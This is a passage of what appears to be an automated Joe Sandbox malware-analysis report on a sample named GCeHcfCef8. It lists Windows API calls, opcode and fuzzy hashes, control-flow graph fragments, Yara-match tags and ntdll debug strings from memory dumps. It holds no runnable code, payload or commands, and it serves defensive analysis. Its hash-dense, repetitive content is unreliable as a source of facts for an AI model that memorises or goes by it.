                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 28aa0d4a7fb3fa4bb70f6dd326d334075190ea4470dbd5e4490af073061728a6
                                                                                                  • Instruction ID: ff03a1181cf52a54fe0fc58fd96af780433a023435e087e0119daf2109d1667f
                                                                                                  • Opcode Fuzzy Hash: 28aa0d4a7fb3fa4bb70f6dd326d334075190ea4470dbd5e4490af073061728a6
                                                                                                  • Instruction Fuzzy Hash: 33900221605400424240716888449068015BBE1211755C231B0D9C560EC5698A666766
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: aafcbabac01e9165085b7fd044c98985bc58bcaab1ffd64ccd3ceb03d44d1ae2
                                                                                                  • Instruction ID: a32bcc248978c05a5a56becf2cc139d719ad0aa787b44fbe3de77c9b4fbe236a
                                                                                                  • Opcode Fuzzy Hash: aafcbabac01e9165085b7fd044c98985bc58bcaab1ffd64ccd3ceb03d44d1ae2
                                                                                                  • Instruction Fuzzy Hash: 8490023120580402D2007158481470B401597D0302F55C121B1568565EC6358A527672
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 927a3e3ef97250dbb99d03954323af98c63e6564dda6606b48494f60475eb9d2
                                                                                                  • Instruction ID: b7ef6d028ca3d6bab1a358f1cd79bd3a5b95ba76430d72c8561c346a1d45c46f
                                                                                                  • Opcode Fuzzy Hash: 927a3e3ef97250dbb99d03954323af98c63e6564dda6606b48494f60475eb9d2
                                                                                                  • Instruction Fuzzy Hash: 7490027120540402D24071584404746401597D0301F55C121B5468564FC6698FD67766
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 0f646906cc84f6c915ba04c7f25fd23dc3dc942d5c2396de8e03c5ecc1482afc
                                                                                                  • Instruction ID: f6fc35065fa69368d9e85e3f1d9598cb7704793820a2210f1d1860373cc14d7e
                                                                                                  • Opcode Fuzzy Hash: 0f646906cc84f6c915ba04c7f25fd23dc3dc942d5c2396de8e03c5ecc1482afc
                                                                                                  • Instruction Fuzzy Hash: 5E90022160540502D20171584404616401A97D0241F95C132B1428565FCA358B93B232
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_GCeHcfCef8.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                                                                                  • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                                                                                                  • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                                                                                  • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 6 41a630-41a661 call 41af60 RtlAllocateHeap
                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_GCeHcfCef8.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID: 6EA
                                                                                                  • API String ID: 1279760036-1400015478
                                                                                                  • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                  • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                                                                                  • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                  • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 229 408395-40839d 231 408369-40836e PostThreadMessageW 229->231 232 40839f-4083f8 call 41be60 call 408310 call 41b750 229->232 234 408370-40838a call 40a480 231->234 235 40838d-408392 231->235 244 408400-408432 call 40f670 call 41a500 232->244 234->235 249 408434-40843c 244->249 250 408467-40846f 244->250 251 408456-408460 249->251 252 40843e-408445 249->252 251->244 253 408462-408465 251->253 252->251 254 408447-40844e 252->254 255 40848d-40849f call 41a490 253->255 254->251 256 408450-408454 254->256 255->250 261 4084a1-40850c call 419d10 255->261 256->251 258 408470-40848a call 41bde0 256->258 258->255 261->250 265 408512-40856e call 419d50 261->265 265->250 268 408574-4085c1 call 41b3f0 call 41b410 call 41c0d0 call 41bde0 call 414a50 265->268
                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_GCeHcfCef8.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MessagePostThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 1836367815-0
                                                                                                  • Opcode ID: d856360fe441cf2af3cf985e7ae352a45966348f131babf4a369b4a02c563762
                                                                                                  • Instruction ID: 513b1df9b156dd44eedd2723c508216830ef1d1bf6efc3dd4786fb69eb0b4070
                                                                                                  • Opcode Fuzzy Hash: d856360fe441cf2af3cf985e7ae352a45966348f131babf4a369b4a02c563762
                                                                                                  • Instruction Fuzzy Hash: 4F51B2B09003099FDB14DF65D985BEB77B8EB48308F10056EF849A7281EB74A945CBA9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 279 41a6a4-41a6a7 280 41a6e0-41a6f9 279->280 281 41a6a9-41a6d8 call 41af60 ExitProcess 279->281 282 41a6ff-41a738 280->282 283 41a6fa call 41af60 280->283 281->280 283->282
                                                                                                  APIs
                                                                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_GCeHcfCef8.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ExitProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 621844428-0
                                                                                                  • Opcode ID: 05afc72a1628d1b8c21c3b037915aba903a84f96ac82d1f5ebd166075e2a44a7
                                                                                                  • Instruction ID: 1f7c6c8582c1dd18883519b10ea502a97e596646afae4287d8848a544c9bbc47
                                                                                                  • Opcode Fuzzy Hash: 05afc72a1628d1b8c21c3b037915aba903a84f96ac82d1f5ebd166075e2a44a7
                                                                                                  • Instruction Fuzzy Hash: 9E112BB2201208BFDB14CF99CC84EEB77ADEF8D754F158258BA0D97241C630E951CBA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 287 408309-40835a call 41be60 call 41ca00 call 40acf0 call 414e50 296 40835c-40836e PostThreadMessageW 287->296 297 40838e-408392 287->297 299 408370-40838a call 40a480 296->299 300 40838d 296->300 299->300 300->297
                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_GCeHcfCef8.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MessagePostThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 1836367815-0
                                                                                                  • Opcode ID: 64066ee14b45ed18fffa828f6523f35c371a9be450f102fc891f591cb5fe6f06
                                                                                                  • Instruction ID: ed9df0ad3365d2002663fa5c40fef5dff36fce5f5ec99479e5a609c370036d9e
                                                                                                  • Opcode Fuzzy Hash: 64066ee14b45ed18fffa828f6523f35c371a9be450f102fc891f591cb5fe6f06
                                                                                                  • Instruction Fuzzy Hash: 6901B531A8032877E721AA959D43FEF776C5B40F54F04012DFF04BA1C2EAA8690642EA
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 303 408310-40831f 304 408328-40835a call 41ca00 call 40acf0 call 414e50 303->304 305 408323 call 41be60 303->305 312 40835c-40836e PostThreadMessageW 304->312 313 40838e-408392 304->313 305->304 315 408370-40838a call 40a480 312->315 316 40838d 312->316 315->316 316->313
                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_GCeHcfCef8.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MessagePostThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 1836367815-0
                                                                                                  • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                                                                  • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                                                                                  • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                                                                  • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_GCeHcfCef8.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FreeHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 3298025750-0
                                                                                                  • Opcode ID: 89cd7130b492affeb9e62c44942b74c6ea8dcb436f98f58145ce05a9f648cd43
                                                                                                  • Instruction ID: e880f57384980f89cf93d6b95c6378fdede24d9d2de261eb18b1810246b2b0e1
                                                                                                  • Opcode Fuzzy Hash: 89cd7130b492affeb9e62c44942b74c6ea8dcb436f98f58145ce05a9f648cd43
                                                                                                  • Instruction Fuzzy Hash: A5E022B41003415BEB10FF65D4C04D737A8BF84314F10852EE84D87206C231E066CB61
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_GCeHcfCef8.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FreeHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 3298025750-0
                                                                                                  • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                  • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                                                                                                  • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                  • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_GCeHcfCef8.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                  • String ID:
                                                                                                  • API String ID: 3899507212-0
                                                                                                  • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                  • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                                                                                                  • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                  • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_GCeHcfCef8.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ExitProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 621844428-0
                                                                                                  • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                  • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                                                                                                  • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                  • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: f10b5c70435c53c7445572044e21212d3b4d89c773d38fb110db281334327424
                                                                                                  • Instruction ID: af9a242a02012c700c32786a984de63edc529fadca1fb764e37b69eca963f61f
                                                                                                  • Opcode Fuzzy Hash: f10b5c70435c53c7445572044e21212d3b4d89c773d38fb110db281334327424
                                                                                                  • Instruction Fuzzy Hash: 32B09B719055D5C5DB11E7644608717B91077D0701F15C171E2434751F4738C1D2F276
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  • write to, xrefs: 01798F56
                                                                                                  • a NULL pointer, xrefs: 01798F90
                                                                                                  • The critical section is owned by thread %p., xrefs: 01798E69
                                                                                                  • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01798E3F
                                                                                                  • *** enter .cxr %p for the context, xrefs: 01798FBD
                                                                                                  • an invalid address, %p, xrefs: 01798F7F
                                                                                                  • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01798F34
                                                                                                  • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01798E86
                                                                                                  • The instruction at %p referenced memory at %p., xrefs: 01798EE2
                                                                                                  • *** enter .exr %p for the exception record, xrefs: 01798FA1
                                                                                                  • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01798F2D
                                                                                                  • *** then kb to get the faulting stack, xrefs: 01798FCC
                                                                                                  • The resource is owned exclusively by thread %p, xrefs: 01798E24
                                                                                                  • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01798DC4
                                                                                                  • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01798FEF
                                                                                                  • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01798D8C
                                                                                                  • The instruction at %p tried to %s , xrefs: 01798F66
                                                                                                  • *** An Access Violation occurred in %ws:%s, xrefs: 01798F3F
                                                                                                  • Go determine why that thread has not released the critical section., xrefs: 01798E75
                                                                                                  • <unknown>, xrefs: 01798D2E, 01798D81, 01798E00, 01798E49, 01798EC7, 01798F3E
                                                                                                  • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01798DA3
                                                                                                  • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01798F26
                                                                                                  • This failed because of error %Ix., xrefs: 01798EF6
                                                                                                  • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01798DD3
                                                                                                  • The resource is owned shared by %d threads, xrefs: 01798E2E
                                                                                                  • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01798DB5
                                                                                                  • *** Resource timeout (%p) in %ws:%s, xrefs: 01798E02
                                                                                                  • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01798E4B
                                                                                                  • *** Inpage error in %ws:%s, xrefs: 01798EC8
                                                                                                  • read from, xrefs: 01798F5D, 01798F62
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                  • API String ID: 0-108210295
                                                                                                  • Opcode ID: 6d5180ef70b1509080ba1fd33550cfba1a4cb4015926214b4f80ec8e35b4b89c
                                                                                                  • Instruction ID: b853459ea08e379dca4a4f57b406e87c1e3bf71b8152e40fda4ff4cbc885e84a
                                                                                                  • Opcode Fuzzy Hash: 6d5180ef70b1509080ba1fd33550cfba1a4cb4015926214b4f80ec8e35b4b89c
                                                                                                  • Instruction Fuzzy Hash: 1B81F7B5A44208BFDF219B1AEC59D7BBB36EF5BB10F050098F6056F212E3718815CA63
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 0-2160512332
                                                                                                  • Opcode ID: a24c4fc5e0b5a9bdb18ba17a9b57ecd3aea29cf422be4990c459aff49a7b1031
                                                                                                  • Instruction ID: 44670ab95c772d724ed69132892341e34c6ff92ea4ae58092104863d9b4ddfa8
                                                                                                  • Opcode Fuzzy Hash: a24c4fc5e0b5a9bdb18ba17a9b57ecd3aea29cf422be4990c459aff49a7b1031
                                                                                                  • Instruction Fuzzy Hash: F0927C71608342ABE761DF28C884B6BFBE9BB84750F04492DFE95D7252D770E844CB92
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  • corrupted critical section, xrefs: 017554C2
                                                                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0175540A, 01755496, 01755519
                                                                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017554CE
                                                                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 01755543
                                                                                                  • double initialized or corrupted critical section, xrefs: 01755508
                                                                                                  • 8, xrefs: 017552E3
                                                                                                  • Invalid debug info address of this critical section, xrefs: 017554B6
                                                                                                  • Critical section address., xrefs: 01755502
                                                                                                  • Address of the debug info found in the active list., xrefs: 017554AE, 017554FA
                                                                                                  • Critical section debug info address, xrefs: 0175541F, 0175552E
                                                                                                  • Thread identifier, xrefs: 0175553A
                                                                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017554E2
                                                                                                  • undeleted critical section in freed memory, xrefs: 0175542B
                                                                                                  • Critical section address, xrefs: 01755425, 017554BC, 01755534
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                  • API String ID: 0-2368682639
                                                                                                  • Opcode ID: 02546ed61a53693736448649a6deb37a537d73bead18006639aa54a2054674d6
                                                                                                  • Instruction ID: 3251e849f2f48ec36ad58582a46698c17daa54db107f20986547c4001b035a93
                                                                                                  • Opcode Fuzzy Hash: 02546ed61a53693736448649a6deb37a537d73bead18006639aa54a2054674d6
                                                                                                  • Instruction Fuzzy Hash: E48189B1A01358EBDB60CF99CC45BAEFBB9EB08B14F20415DF909B7241D3B5A941CB50
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01752624
                                                                                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017524C0
                                                                                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 0175261F
                                                                                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01752602
                                                                                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01752498
                                                                                                  • @, xrefs: 0175259B
                                                                                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017522E4
                                                                                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01752409
                                                                                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01752412
                                                                                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017525EB
                                                                                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01752506
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                  • API String ID: 0-4009184096
                                                                                                  • Opcode ID: 1880a7cdbbcbad25e739320d6292897842b379b1edbf93dae91e35f1291ba067
                                                                                                  • Instruction ID: 27af2138516a88654fdef496941b2f0f3b34dee8f2697af2b77eb00f28f83e3b
                                                                                                  • Opcode Fuzzy Hash: 1880a7cdbbcbad25e739320d6292897842b379b1edbf93dae91e35f1291ba067
